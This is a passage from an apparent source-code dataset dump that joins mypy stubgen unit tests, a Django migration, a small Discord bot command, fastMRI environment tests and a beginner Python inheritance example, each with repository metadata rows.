os.mkdir('subdir')
self.make_file('subdir', 'a.py')
self.make_file('subdir', 'b.py')
os.mkdir(os.path.join('subdir', 'pack'))
self.make_file('subdir', 'pack', '__init__.py')
opts = parse_options(['subdir'])
py_mods, c_mods = collect_build_targets(opts, mypy_options(opts))
assert_equal(c_mods, [])
files = {mod.path for mod in py_mods}
assert_equal(files, {os.path.join('subdir', 'pack', '__init__.py'),
os.path.join('subdir', 'a.py'),
os.path.join('subdir', 'b.py')})
finally:
os.chdir(current)
@unittest.skipIf(sys.platform == 'win32', "clean up fails on Windows")
def test_packages_found(self) -> None:
current = os.getcwd()
with tempfile.TemporaryDirectory() as tmp:
try:
os.chdir(tmp)
os.mkdir('pack')
self.make_file('pack', '__init__.py', content='from . import a, b')
self.make_file('pack', 'a.py')
self.make_file('pack', 'b.py')
opts = parse_options(['-p', 'pack'])
py_mods, c_mods = collect_build_targets(opts, mypy_options(opts))
assert_equal(c_mods, [])
files = {os.path.relpath(mod.path or 'FAIL') for mod in py_mods}
assert_equal(files, {os.path.join('pack', '__init__.py'),
os.path.join('pack', 'a.py'),
os.path.join('pack', 'b.py')})
finally:
os.chdir(current)
@unittest.skipIf(sys.platform == 'win32', "clean up fails on Windows")
def test_module_not_found(self) -> None:
current = os.getcwd()
captured_output = io.StringIO()
sys.stdout = captured_output
with tempfile.TemporaryDirectory() as tmp:
try:
os.chdir(tmp)
self.make_file(tmp, 'mymodule.py', content='import a')
opts = parse_options(['-m', 'mymodule'])
py_mods, c_mods = collect_build_targets(opts, mypy_options(opts))
assert captured_output.getvalue() == ''
finally:
sys.stdout = sys.__stdout__
os.chdir(current)
def make_file(self, *path: str, content: str = '') -> None:
file = os.path.join(*path)
with open(file, 'w') as f:
f.write(content)
def run(self, result: Optional[Any] = None) -> Optional[Any]:
with local_sys_path_set():
return super().run(result)
class StubgenCliParseSuite(unittest.TestCase):
def test_walk_packages(self) -> None:
with ModuleInspect() as m:
assert_equal(
set(walk_packages(m, ["mypy.errors"])),
{"mypy.errors"})
assert_equal(
set(walk_packages(m, ["mypy.errors", "mypy.stubgen"])),
{"mypy.errors", "mypy.stubgen"})
all_mypy_packages = set(walk_packages(m, ["mypy"]))
self.assertTrue(all_mypy_packages.issuperset({
"mypy",
"mypy.errors",
"mypy.stubgen",
"mypy.test",
"mypy.test.helpers",
}))
class StubgenUtilSuite(unittest.TestCase):
"""Unit tests for stubgen utility functions."""
def test_parse_signature(self) -> None:
self.assert_parse_signature('func()', ('func', [], []))
def test_parse_signature_with_args(self) -> None:
self.assert_parse_signature('func(arg)', ('func', ['arg'], []))
self.assert_parse_signature('do(arg, arg2)', ('do', ['arg', 'arg2'], []))
def test_parse_signature_with_optional_args(self) -> None:
self.assert_parse_signature('func([arg])', ('func', [], ['arg']))
self.assert_parse_signature('func(arg[, arg2])', ('func', ['arg'], ['arg2']))
self.assert_parse_signature('func([arg[, arg2]])', ('func', [], ['arg', 'arg2']))
def test_parse_signature_with_default_arg(self) -> None:
self.assert_parse_signature('func(arg=None)', ('func', [], ['arg']))
self.assert_parse_signature('func(arg, arg2=None)', ('func', ['arg'], ['arg2']))
self.assert_parse_signature('func(arg=1, arg2="")', ('func', [], ['arg', 'arg2']))
def test_parse_signature_with_qualified_function(self) -> None:
self.assert_parse_signature('ClassName.func(arg)', ('func', ['arg'], []))
def test_parse_signature_with_kw_only_arg(self) -> None:
self.assert_parse_signature('ClassName.func(arg, *, arg2=1)',
('func', ['arg', '*'], ['arg2']))
def test_parse_signature_with_star_arg(self) -> None:
self.assert_parse_signature('ClassName.func(arg, *args)',
('func', ['arg', '*args'], []))
def test_parse_signature_with_star_star_arg(self) -> None:
self.assert_parse_signature('ClassName.func(arg, **args)',
('func', ['arg', '**args'], []))
def assert_parse_signature(self, sig: str, result: Tuple[str, List[str], List[str]]) -> None:
assert_equal(parse_signature(sig), result)
def test_build_signature(self) -> None:
assert_equal(build_signature([], []), '()')
assert_equal(build_signature(['arg'], []), '(arg)')
assert_equal(build_signature(['arg', 'arg2'], []), '(arg, arg2)')
assert_equal(build_signature(['arg'], ['arg2']), '(arg, arg2=...)')
assert_equal(build_signature(['arg'], ['arg2', '**x']), '(arg, arg2=..., **x)')
def test_parse_all_signatures(self) -> None:
assert_equal(parse_all_signatures(['random text',
'.. function:: fn(arg',
'.. function:: fn()',
' .. method:: fn2(arg)']),
([('fn', '()'),
('fn2', '(arg)')], []))
def test_find_unique_signatures(self) -> None:
assert_equal(find_unique_signatures(
[('func', '()'),
('func', '()'),
('func2', '()'),
('func2', '(arg)'),
('func3', '(arg, arg2)')]),
[('func', '()'),
('func3', '(arg, arg2)')])
def test_infer_sig_from_docstring(self) -> None:
assert_equal(infer_sig_from_docstring('\nfunc(x) - y', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x')], ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x, Y_a=None)', 'func'),
[FunctionSig(name='func',
args=[ArgSig(name='x'), ArgSig(name='Y_a', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x, Y_a=3)', 'func'),
[FunctionSig(name='func',
args=[ArgSig(name='x'), ArgSig(name='Y_a', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x, Y_a=[1, 2, 3])', 'func'),
[FunctionSig(name='func',
args=[ArgSig(name='x'), ArgSig(name='Y_a', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nafunc(x) - y', 'func'), [])
assert_equal(infer_sig_from_docstring('\nfunc(x, y', 'func'), [])
assert_equal(infer_sig_from_docstring('\nfunc(x=z(y))', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc x', 'func'), [])
# Try to infer signature from type annotation.
assert_equal(infer_sig_from_docstring('\nfunc(x: int)', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='int')],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x: int=3)', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='int', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x: int=3) -> int', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='int', default=True)],
ret_type='int')])
assert_equal(infer_sig_from_docstring('\nfunc(x: int=3) -> int \n', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='int', default=True)],
ret_type='int')])
assert_equal(infer_sig_from_docstring('\nfunc(x: Tuple[int, str]) -> str', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='Tuple[int,str]')],
ret_type='str')])
assert_equal(
infer_sig_from_docstring('\nfunc(x: Tuple[int, Tuple[str, int], str], y: int) -> str',
'func'),
[FunctionSig(name='func',
args=[ArgSig(name='x', type='Tuple[int,Tuple[str,int],str]'),
ArgSig(name='y', type='int')],
ret_type='str')])
assert_equal(infer_sig_from_docstring('\nfunc(x: foo.bar)', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='foo.bar')],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x: list=[1,2,[3,4]])', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='list', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x: str="nasty[")', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='str', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc[(x: foo.bar, invalid]', 'func'), [])
assert_equal(infer_sig_from_docstring('\nfunc(x: invalid::type<with_template>)', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type=None)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x: str="")', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='str', default=True)],
ret_type='Any')])
def test_infer_sig_from_docstring_duplicate_args(self) -> None:
assert_equal(infer_sig_from_docstring('\nfunc(x, x) -> str\nfunc(x, y) -> int', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x'), ArgSig(name='y')],
ret_type='int')])
def test_infer_sig_from_docstring_bad_indentation(self) -> None:
assert_equal(infer_sig_from_docstring("""
x
x
x
""", 'func'), None)
def test_infer_arg_sig_from_anon_docstring(self) -> None:
assert_equal(infer_arg_sig_from_anon_docstring("(*args, **kwargs)"),
[ArgSig(name='*args'), ArgSig(name='**kwargs')])
assert_equal(
infer_arg_sig_from_anon_docstring(
"(x: Tuple[int, Tuple[str, int], str]=(1, ('a', 2), 'y'), y: int=4)"),
[ArgSig(name='x', type='Tuple[int,Tuple[str,int],str]', default=True),
ArgSig(name='y', type='int', default=True)])
def test_infer_prop_type_from_docstring(self) -> None:
assert_equal(infer_prop_type_from_docstring('str: A string.'), 'str')
assert_equal(infer_prop_type_from_docstring('Optional[int]: An int.'), 'Optional[int]')
assert_equal(infer_prop_type_from_docstring('Tuple[int, int]: A tuple.'),
'Tuple[int, int]')
assert_equal(infer_prop_type_from_docstring('\nstr: A string.'), None)
def test_infer_sig_from_docstring_square_brackets(self) -> None:
assert infer_sig_from_docstring(
'fetch_row([maxrows, how]) -- Fetches stuff',
'fetch_row',
) == []
def test_remove_misplaced_type_comments_1(self) -> None:
good = """
\u1234
def f(x): # type: (int) -> int
def g(x):
# type: (int) -> int
def h():
# type: () int
x = 1 # type: int
"""
assert_equal(remove_misplaced_type_comments(good), good)
def test_remove_misplaced_type_comments_2(self) -> None:
bad = """
def f(x):
# type: Callable[[int], int]
pass
# type: "foo"
# type: 'bar'
x = 1
# type: int
"""
bad_fixed = """
def f(x):
pass
x = 1
"""
assert_equal(remove_misplaced_type_comments(bad), bad_fixed)
def test_remove_misplaced_type_comments_3(self) -> None:
bad = '''
def f(x):
"""docstring"""
# type: (int) -> int
pass
def g(x):
"""docstring
"""
# type: (int) -> int
pass
'''
bad_fixed = '''
def f(x):
"""docstring"""
pass
def g(x):
"""docstring
"""
pass
'''
assert_equal(remove_misplaced_type_comments(bad), bad_fixed)
def test_remove_misplaced_type_comments_4(self) -> None:
bad = """
def f(x):
'''docstring'''
# type: (int) -> int
pass
def g(x):
'''docstring
'''
# type: (int) -> int
pass
"""
bad_fixed = """
def f(x):
'''docstring'''
pass
def g(x):
'''docstring
'''
pass
"""
assert_equal(remove_misplaced_type_comments(bad), bad_fixed)
def test_remove_misplaced_type_comments_5(self) -> None:
bad = """
def f(x):
# type: (int, List[Any],
# float, bool) -> int
pass
def g(x):
# type: (int, List[Any])
pass
"""
bad_fixed = """
def f(x):
# float, bool) -> int
pass
def g(x):
pass
"""
assert_equal(remove_misplaced_type_comments(bad), bad_fixed)
def test_remove_misplaced_type_comments_bytes(self) -> None:
original = b"""
\xbf
def f(x): # type: (int) -> int
def g(x):
# type: (int) -> int
pass
def h():
# type: int
pass
x = 1 # type: int
"""
dest = b"""
\xbf
def f(x): # type: (int) -> int
def g(x):
# type: (int) -> int
pass
def h():
pass
x = 1 # type: int
"""
assert_equal(remove_misplaced_type_comments(original), dest)
def test_common_dir_prefix(self) -> None:
assert common_dir_prefix([]) == '.'
assert common_dir_prefix(['x.pyi']) == '.'
assert common_dir_prefix(['./x.pyi']) == '.'
assert common_dir_prefix(['foo/bar/x.pyi']) == 'foo/bar'
assert common_dir_prefix(['foo/bar/x.pyi',
'foo/bar/y.pyi']) == 'foo/bar'
assert common_dir_prefix(['foo/bar/x.pyi', 'foo/y.pyi']) == 'foo'
assert common_dir_prefix(['foo/x.pyi', 'foo/bar/y.pyi']) == 'foo'
assert common_dir_prefix(['foo/bar/zar/x.pyi', 'foo/y.pyi']) == 'foo'
assert common_dir_prefix(['foo/x.pyi', 'foo/bar/zar/y.pyi']) == 'foo'
assert common_dir_prefix(['foo/bar/zar/x.pyi', 'foo/bar/y.pyi']) == 'foo/bar'
assert common_dir_prefix(['foo/bar/x.pyi', 'foo/bar/zar/y.pyi']) == 'foo/bar'
class StubgenHelpersSuite(unittest.TestCase):
def test_is_blacklisted_path(self) -> None:
assert not is_blacklisted_path('foo/bar.py')
assert not is_blacklisted_path('foo.py')
assert not is_blacklisted_path('foo/xvendor/bar.py')
assert not is_blacklisted_path('foo/vendorx/bar.py')
assert is_blacklisted_path('foo/vendor/bar.py')
assert is_blacklisted_path('foo/vendored/bar.py')
assert is_blacklisted_path('foo/vendored/bar/thing.py')
assert is_blacklisted_path('foo/six.py')
def test_is_non_library_module(self) -> None:
assert not is_non_library_module('foo')
assert not is_non_library_module('foo.bar')
# The following could be test modules, but we are very conservative and
# don't treat them as such since they could plausibly be real modules.
assert not is_non_library_module('foo.bartest')
assert not is_non_library_module('foo.bartests')
assert not is_non_library_module('foo.testbar')
assert is_non_library_module('foo.test')
assert is_non_library_module('foo.test.foo')
assert is_non_library_module('foo.tests')
assert is_non_library_module('foo.tests.foo')
assert is_non_library_module('foo.testing.foo')
assert is_non_library_module('foo.SelfTest.foo')
assert is_non_library_module('foo.test_bar')
assert is_non_library_module('foo.bar_tests')
assert is_non_library_module('foo.testing')
assert is_non_library_module('foo.conftest')
assert is_non_library_module('foo.bar_test_util')
assert is_non_library_module('foo.bar_test_utils')
assert is_non_library_module('foo.bar_test_base')
assert is_non_library_module('foo.setup')
assert is_non_library_module('foo.__main__')
class StubgenPythonSuite(DataSuite):
"""Data-driven end-to-end test cases that generate stub files.
You can use these magic test case name suffixes:
*_semanal
Run semantic analysis (slow as this uses real stubs -- only use
when necessary)
*_import
Import module and perform runtime introspection (in the current
process!)
You can use these magic comments:
# flags: --some-stubgen-option ...
Specify custom stubgen options
# modules: module1 module2 ...
Specify which modules to output (by default only 'main')
"""
required_out_section = True
base_path = '.'
files = ['stubgen.test']
def run_case(self, testcase: DataDrivenTestCase) -> None:
with local_sys_path_set():
self.run_case_inner(testcase)
def run_case_inner(self, testcase: DataDrivenTestCase) -> None:
extra = [] # Extra command-line args
mods = [] # Module names to process
source = '\n'.join(testcase.input)
for file, content in testcase.files + [('./main.py', source)]:
# Strip ./ prefix and .py suffix.
mod = file[2:-3].replace('/', '.')
if mod.endswith('.__init__'):
mod, _, _ = mod.rpartition('.')
mods.append(mod)
if '-p ' not in source:
extra.extend(['-m', mod])
with open(file, 'w') as f:
f.write(content)
options = self.parse_flags(source, extra)
modules = self.parse_modules(source)
out_dir = 'out'
try:
try:
if not testcase.name.endswith('_import'):
options.no_import = True
if not testcase.name.endswith('_semanal'):
options.parse_only = True
generate_stubs(options)
a = [] # type: List[str]
for module in modules:
fnam = module_to_path(out_dir, module)
self.add_file(fnam, a, header=len(modules) > 1)
except CompileError as e:
a = e.messages
assert_string_arrays_equal(testcase.output, a,
'Invalid output ({}, line {})'.format(
testcase.file, testcase.line))
finally:
for mod in mods:
if mod in sys.modules:
del sys.modules[mod]
shutil.rmtree(out_dir)
def parse_flags(self, program_text: str, extra: List[str]) -> Options:
flags = re.search('# flags: (.*)$', program_text, flags=re.MULTILINE)
if flags:
flag_list = flags.group(1).split()
else:
flag_list = []
options = parse_options(flag_list + extra)
if '--verbose' not in flag_list:
options.quiet = True
else:
options.verbose = True
return options
def parse_modules(self, program_text: str) -> List[str]:
modules = re.search('# modules: (.*)$', program_text, flags=re.MULTILINE)
if modules:
return modules.group(1).split()
else:
return ['main']
def add_file(self, path: str, result: List[str], header: bool) -> None:
if not os.path.exists(path):
result.append('<%s was not generated>' % path.replace('\\', '/'))
return
if header:
result.append('# {}'.format(path[4:]))
with open(path, encoding='utf8') as file:
result.extend(file.read().splitlines())
self_arg = ArgSig(name='self')
class StubgencSuite(unittest.TestCase):
"""Unit tests for stub generation from C modules using introspection.
Note that these don't cover a lot!
"""
def test_infer_hash_sig(self) -> None:
assert_equal(infer_method_sig('__hash__'), [self_arg])
def test_infer_getitem_sig(self) -> None:
assert_equal(infer_method_sig('__getitem__'), [self_arg, ArgSig(name='index')])
def test_infer_setitem_sig(self) -> None:
assert_equal(infer_method_sig('__setitem__'),
[self_arg, ArgSig(name='index'), ArgSig(name='object')])
def test_infer_binary_op_sig(self) -> None:
for op in ('eq', 'ne', 'lt', 'le', 'gt', 'ge',
'add', 'radd', 'sub', 'rsub', 'mul', 'rmul'):
assert_equal(infer_method_sig('__%s__' % op), [self_arg, ArgSig(name='other')])
def test_infer_unary_op_sig(self) -> None:
for op in ('neg', 'pos'):
assert_equal(infer_method_sig('__%s__' % op), [self_arg])
def test_generate_c_type_stub_no_crash_for_object(self) -> None:
output = [] # type: List[str]
mod = ModuleType('module', '') # any module is fine
imports = [] # type: List[str]
generate_c_type_stub(mod, 'alias', object, output, imports)
assert_equal(imports, [])
assert_equal(output[0], 'class alias:')
def test_generate_c_type_stub_variable_type_annotation(self) -> None:
# This class mimics the stubgen unit test 'testClassVariable'
class TestClassVariableCls:
x = 1
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType('module', '') # any module is fine
generate_c_type_stub(mod, 'C', TestClassVariableCls, output, imports)
assert_equal(imports, [])
assert_equal(output, ['class C:', ' x: Any = ...'])
def test_generate_c_type_inheritance(self) -> None:
class TestClass(KeyError):
pass
output = [] # type: List[str]
imports = [] # type: List[str]
        mod = ModuleType('module', '')
generate_c_type_stub(mod, 'C', TestClass, output, imports)
assert_equal(output, ['class C(KeyError): ...', ])
assert_equal(imports, [])
def test_generate_c_type_inheritance_same_module(self) -> None:
class TestBaseClass:
pass
class TestClass(TestBaseClass):
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType(TestBaseClass.__module__, '')
generate_c_type_stub(mod, 'C', TestClass, output, imports)
assert_equal(output, ['class C(TestBaseClass): ...', ])
assert_equal(imports, [])
def test_generate_c_type_inheritance_other_module(self) -> None:
import argparse
class TestClass(argparse.Action):
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType('module', '')
generate_c_type_stub(mod, 'C', TestClass, output, imports)
assert_equal(output, ['class C(argparse.Action): ...', ])
assert_equal(imports, ['import argparse'])
def test_generate_c_type_with_docstring(self) -> None:
class TestClass:
def test(self, arg0: str) -> None:
"""
test(self: TestClass, arg0: int)
"""
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType(TestClass.__module__, '')
generate_c_function_stub(mod, 'test', TestClass.test, output, imports,
self_var='self', class_name='TestClass')
assert_equal(output, ['def test(self, arg0: int) -> Any: ...'])
assert_equal(imports, [])
def test_generate_c_type_with_docstring_empty_default(self) -> None:
class TestClass:
def test(self, arg0: str = "") -> None:
"""
test(self: TestClass, arg0: str = "")
"""
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType(TestClass.__module__, '')
generate_c_function_stub(mod, 'test', TestClass.test, output, imports,
self_var='self', class_name='TestClass')
assert_equal(output, ['def test(self, arg0: str = ...) -> Any: ...'])
assert_equal(imports, [])
def test_generate_c_function_other_module_arg(self) -> None:
"""Test that if argument references type from other module, module will be imported."""
# Provide different type in python spec than in docstring to make sure, that docstring
# information is used.
def test(arg0: str) -> None:
"""
test(arg0: argparse.Action)
"""
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType(self.__module__, '')
generate_c_function_stub(mod, 'test', test, output, imports)
assert_equal(output, ['def test(arg0: argparse.Action) -> Any: ...'])
assert_equal(imports, ['import argparse'])
def test_generate_c_function_same_module_arg(self) -> None:
"""Test that if argument references type from same module but using full path, no module
will be imported, and type specification will be striped to local reference.
"""
# Provide different type in python spec than in docstring to make sure, that docstring
# information is used.
def test(arg0: str) -> None:
"""
test(arg0: argparse.Action)
"""
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType('argparse', '')
generate_c_function_stub(mod, 'test', test, output, imports)
assert_equal(output, ['def test(arg0: Action) -> Any: ...'])
assert_equal(imports, [])
def test_generate_c_function_other_module_ret(self) -> None:
"""Test that if return type references type from other module, module will be imported."""
def test(arg0: str) -> None:
"""
test(arg0: str) -> argparse.Action
"""
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType(self.__module__, '')
generate_c_function_stub(mod, 'test', test, output, imports)
assert_equal(output, ['def test(arg0: str) -> argparse.Action: ...'])
assert_equal(imports, ['import argparse'])
def test_generate_c_function_same_module_ret(self) -> None:
"""Test that if return type references type from same module but using full path,
no module will be imported, and type specification will be striped to local reference.
"""
def test(arg0: str) -> None:
"""
test(arg0: str) -> argparse.Action
"""
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType('argparse', '')
generate_c_function_stub(mod, 'test', test, output, imports)
assert_equal(output, ['def test(arg0: str) -> Action: ...'])
assert_equal(imports, [])
def test_generate_c_property_with_pybind11(self) -> None:
"""Signatures included by PyBind11 inside property.fget are read."""
class TestClass:
def get_attribute(self) -> None:
"""
(self: TestClass) -> str
"""
pass
attribute = property(get_attribute, doc="")
output = [] # type: List[str]
generate_c_property_stub('attribute', TestClass.attribute, output, readonly=True)
assert_equal(output, ['@property', 'def attribute(self) -> str: ...'])
def test_generate_c_type_with_overload_pybind11(self) -> None:
class TestClass:
def __init__(self, arg0: str) -> None:
"""
__init__(*args, **kwargs)
Overloaded function.
1. __init__(self: TestClass, arg0: str) -> None
2. __init__(self: TestClass, arg0: str, arg1: str) -> None
"""
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType(TestClass.__module__, '')
generate_c_function_stub(mod, '__init__', TestClass.__init__, output, imports,
self_var='self', class_name='TestClass')
assert_equal(output, [
'@overload',
'def __init__(self, arg0: str) -> None: ...',
'@overload',
'def __init__(self, arg0: str, arg1: str) -> None: ...',
'@overload',
'def __init__(*args, **kwargs) -> Any: ...'])
assert_equal(set(imports), {'from typing import overload'})
class ArgSigSuite(unittest.TestCase):
def test_repr(self) -> None:
assert_equal(repr(ArgSig(name='asd"dsa')),
"ArgSig(name='asd\"dsa', type=None, default=False)")
assert_equal(repr(ArgSig(name="asd'dsa")),
'ArgSig(name="asd\'dsa", type=None, default=False)')
assert_equal(repr(ArgSig("func", 'str')),
"ArgSig(name='func', type='str', default=False)")
assert_equal(repr(ArgSig("func", 'str', default=True)),
"ArgSig(name='func', type='str', default=True)")
class IsValidTypeSuite(unittest.TestCase):
def test_is_valid_type(self) -> None:
assert is_valid_type('int')
assert is_valid_type('str')
assert is_valid_type('Foo_Bar234')
assert is_valid_type('foo.bar')
assert is_valid_type('List[int]')
assert is_valid_type('Dict[str, int]')
assert is_valid_type('None')
assert not is_valid_type('foo-bar')
assert not is_valid_type('x->y')
assert not is_valid_type('True')
assert not is_valid_type('False')
assert not is_valid_type('x,y')
assert not is_valid_type('x, y')
class ModuleInspectSuite(unittest.TestCase):
def test_python_module(self) -> None:
with ModuleInspect() as m:
p = m.get_package_properties('inspect')
assert p is not None
assert p.name == 'inspect'
assert p.file
assert p.path is None
assert p.is_c_module is False
assert p.subpackages == []
def test_python_package(self) -> None:
with ModuleInspect() as m:
p = m.get_package_properties('unittest')
assert p is not None
assert p.name == 'unittest'
assert p.file
assert p.path
assert p.is_c_module is False
assert p.subpackages
assert all(sub.startswith('unittest.') for sub in p.subpackages)
def test_c_module(self) -> None:
with ModuleInspect() as m:
p = m.get_package_properties('_socket')
assert p is not None
assert p.name == '_socket'
assert p.path is None
assert p.is_c_module is True
assert p.subpackages == []
def test_non_existent(self) -> None:
with ModuleInspect() as m:
with self.assertRaises(InspectError) as e:
m.get_package_properties('foobar-non-existent')
assert str(e.exception) == "No module named 'foobar-non-existent'"
def module_to_path(out_dir: str, module: str) -> str:
fnam = os.path.join(out_dir, '{}.pyi'.format(module.replace('.', '/')))
if not os.path.exists(fnam):
alt_fnam = fnam.replace('.pyi', '/__init__.pyi')
if os.path.exists(alt_fnam):
return alt_fnam
return fnam
| [
"[email protected]"
] | |
c423bf6d59f5a31288293453b53fb976b8347c87 | 11d700eb1108e1b40ff9c7ff57f5b25d2fcd4ecc | /myweb/login/migrations/0006_auto_20210426_1439.py | ff14c713c26a15ea84b77942210676fd5faa79f6 | [] | no_license | KoeyNim/Git-Community | 307fbe251c3b9d8f6e1f22629890775e8dd0d336 | aba59983becb796f0d4f7f3e41f4883ac9cad0b7 | refs/heads/master | 2023-04-16T17:54:15.268698 | 2021-04-30T07:37:51 | 2021-04-30T07:37:51 | 325,216,311 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 491 | py | # Generated by Django 3.1.7 on 2021-04-26 05:39
from django.db import migrations, models
import login.Validators
class Migration(migrations.Migration):
dependencies = [
('login', '0005_auto_20210426_1438'),
]
operations = [
migrations.AlterField(
model_name='user',
name='phone',
field=models.CharField(default='', max_length=11, validators=[login.Validators.PhoneValidate], verbose_name='전화번호'),
),
]
| [
"[email protected]"
] | |
5fa845cfc1438b8852de6c6c9363dca2bcb67aca | 4439df6ac5b8bec2ff643a1ec57fb85073a08a23 | /MoMMI/Modules/worksonmymachinetm.py | fc66475c580925ed53b650be178db71c31cdd588 | [
"MIT"
] | permissive | Wizardcrying/MoMMI | 709fd133a90f9351bcfc5d7e704838c8d283c461 | 30957a55cbe2c077d6b421d3727250299ed10a0d | refs/heads/master | 2020-06-20T17:49:59.953032 | 2016-11-26T13:57:37 | 2016-11-26T13:57:37 | 74,852,412 | 0 | 0 | null | 2016-11-26T21:49:18 | 2016-11-26T21:49:18 | null | UTF-8 | Python | false | false | 395 | py | from ..client import client
from ..commands import always_command
import re
import aiofiles
@always_command(True)
async def worksonmymachine(message):
match = re.search(r"works\s*(for me|((at|on|in)\s*m(y|ine)\s*.*))", message.content, re.IGNORECASE)
if match is None:
return
await client.send_file(message.channel, "/home/pj/MoMMI/Files/worksonmymachine.png")
| [
"[email protected]"
] | |
e0a9b7881060b89d3ac4782a2bfb862c1daaf3e0 | c431e16d3bfb0a709e747134878615ef4552f79a | /tests/fastmri/test_envs.py | ae7476c5a4668a4e4c871ec14765990f1dd3c4a7 | [
"MIT"
] | permissive | odelalleau/active-mri-acquisition | 4939eaad659588148e497ad863844b4613f1a8bf | 90abc1ebdfc56925c4136115c7d8f4c6f208f912 | refs/heads/master | 2023-02-25T04:38:58.045324 | 2021-01-29T17:34:38 | 2021-01-29T17:34:38 | 334,206,247 | 0 | 0 | MIT | 2021-01-29T18:04:17 | 2021-01-29T16:50:28 | Python | UTF-8 | Python | false | false | 4,179 | py | # Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
import pytest # noqa: F401
import activemri.envs.envs as envs
class TestMICCAIEnv:
env = envs.MICCAI2020Env()
def test_miccai_env_batch_content(self):
for i, batch in enumerate(self.env._train_data_handler):
# No check below for batch[1], since it's the mask and will be replaced later
for j in [0, 1, 3, 4, 5]:
assert isinstance(batch[j], list)
assert len(batch[j]) == self.env.num_parallel_episodes
for batch_idx in range(self.env.num_parallel_episodes):
assert isinstance(batch[0][batch_idx], np.ndarray)
assert batch[0][batch_idx].shape == (
640,
368,
2,
) # k-space
assert isinstance(batch[2][batch_idx], np.ndarray)
assert batch[2][batch_idx].shape == (640, 368, 2) # ground truth image
# data.attrs
assert len(batch[3][batch_idx]) == 4
for key in ["norm", "max", "patient_id", "acquisition"]:
assert key in batch[3][batch_idx]
# file name
assert isinstance(batch[4][batch_idx], str)
# slice_id
assert isinstance(batch[5][batch_idx], int)
if i == 10:
break
def test_miccai_reset(self):
obs, _ = self.env.reset()
assert len(obs) == 3
assert "reconstruction" in obs
assert "mask" in obs
assert "extra_outputs" in obs
assert obs["reconstruction"].shape == (
self.env.num_parallel_episodes,
640,
368,
2,
)
assert obs["mask"].shape == (self.env.num_parallel_episodes, 368)
class TestSingleCoilKneeEnv:
env = envs.SingleCoilKneeEnv()
def test_singlecoil_knee_env_batch_content(self):
for i, batch in enumerate(self.env._train_data_handler):
# No check below for batch[1], since it's the mask and will be replaced later
kspace, _, ground_truth, attrs, fname, slice_id = batch
for j in [0, 1, 3, 4, 5]:
assert isinstance(batch[j], list)
assert len(batch[j]) == self.env.num_parallel_episodes
for batch_idx in range(self.env.num_parallel_episodes):
assert isinstance(kspace[batch_idx], np.ndarray)
assert np.all(
np.iscomplex(kspace[batch_idx][np.nonzero(kspace[batch_idx])])
)
assert kspace[batch_idx].shape in [(640, 368), (640, 372)] # k-space
assert isinstance(ground_truth[batch_idx], np.ndarray)
assert not np.any(np.iscomplex(ground_truth[batch_idx]))
assert ground_truth[batch_idx].shape == (320, 320) # ground_truth
# data.attrs
assert len(attrs[batch_idx]) == 8
for key in [
"acquisition",
"max",
"norm",
"patient_id",
"padding_left",
"padding_right",
"encoding_size",
"recon_size",
]:
assert key in attrs[batch_idx]
# file name
assert isinstance(fname[batch_idx], str)
# slice_id
assert isinstance(slice_id[batch_idx], int)
if i == 10:
break
def test_singlecoil_knee_reset(self):
obs, _ = self.env.reset()
assert len(obs) == 3
assert "reconstruction" in obs
assert "mask" in obs
assert "extra_outputs" in obs
assert obs["reconstruction"].shape == (self.env.num_parallel_episodes, 320, 320)
assert obs["mask"].shape in [
(self.env.num_parallel_episodes, 368),
(self.env.num_parallel_episodes, 372),
]
| [
"[email protected]"
] | |
938f201ccda6e3d76066c4ead1b6b853a53fd18d | 7326c2589e6dc250083415d65e28754ea1e9968e | /17_Inheritance_1.py | 14c4ee3ba0eb6d4a42889fa6191f96fb6cc308af | [] | no_license | nanoyslee/Python_Calulator-Login | 23aa1dd2135dafaa43de5c1d9ce12268e18eab19 | 5a4be881c96dd4495d58160f176d1c07283dd8bb | refs/heads/master | 2020-03-28T12:03:32.493326 | 2018-09-27T22:32:23 | 2018-09-27T22:32:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | class Class1(object):
def method1(self):
return 'm1'
c1 = Class1()
print(c1.method1())
class Class2(object):
def method1(self):
return 'm1'
def method2(self):
return 'm2'
c2 = Class2()
